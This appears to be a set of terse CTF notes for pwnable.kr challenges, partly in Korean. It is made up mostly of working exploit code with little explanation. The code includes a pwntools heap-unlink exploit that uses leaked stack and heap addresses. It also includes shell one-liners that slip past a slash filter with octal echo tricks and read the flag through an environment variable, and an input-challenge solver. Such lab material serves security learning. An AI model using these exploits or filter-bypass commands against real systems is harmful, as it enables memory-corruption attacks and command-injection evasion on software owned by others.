SSo

payload

from pwn import *

p = process('/home/unlink/unlink')

p.recvuntil("here is stack address leak:")
stackAddr = int(p.recvline(0), 16)

p.recvuntil("here is heap address leak:")
heapAddr = int(p.recvline(0), 16)

payload = "\xeb\x84\x04\x08"
payload += "A"*12
payload += p32(heapAddr+0xc)
payload += p32(stackAddr+0x10)

p.send(payload)
print p.interactive()

참고

http://www.hackerschool.org/HS_Boards/data/Lib_system/dfb_leon.txt

https://bpsecblog.wordpress.com/2016/10/06/heap_vuln/

http://nroses-taek.tistory.com/160

https://delspon.wordpress.com/2017/07/07/pwnable-kr-unlink/

$ ./cmd2 '$(echo "\057")bin$(echo "\057")cat fla*'

echo로 oct를 표현할 수 있는 방법을 이용해 필터된 slash를 우회했다.

$sh  export gogo="flag"
$sh ./cmd1 "/bin/cat \$gogo"

exploit code

# -*- coding: utf-8 -*-
from pwn import *

global port
port = "8080"

def stage1():
	arg = ['/home/input2/input'] 

	for i in range(99):
		arg.append(str(i))	
	arg[65] = "\x00"
	arg[66] = "\x20\x0a\x0d"
	arg[67] = port #stage5
	return arg

def stage2():
	f = open("stderr", "w")
	f.write("\x00\x0a\x02\xff")
	f.close()
	err = open("stderr", "r")
	return err

def stage3():
	env = {'\xde\xad\xbe\xef': '\xca\xfe\xba\xbe'}
	return env

def stage4():
	fp = open("\x0a", "w")
	fp.write("\x00\x00\x00\x00")
	fp.close()
	
def stage5():
	r = remote("localhost", int(port))
	r.sendline("\xde\xad\xbe\xef")
	r.close()

def main():
	p = process(stage1(), env=stage3(), stderr=stage2())
	print p.recv(1024)
	p.sendline("\x00\x0a\x00\xff") # stage2
	print p.recvline('')
	stage4()
	print p.recv(1024)
	stage5()
	p.interactive()
	p.close()

if __name__ == "__main__":
	main()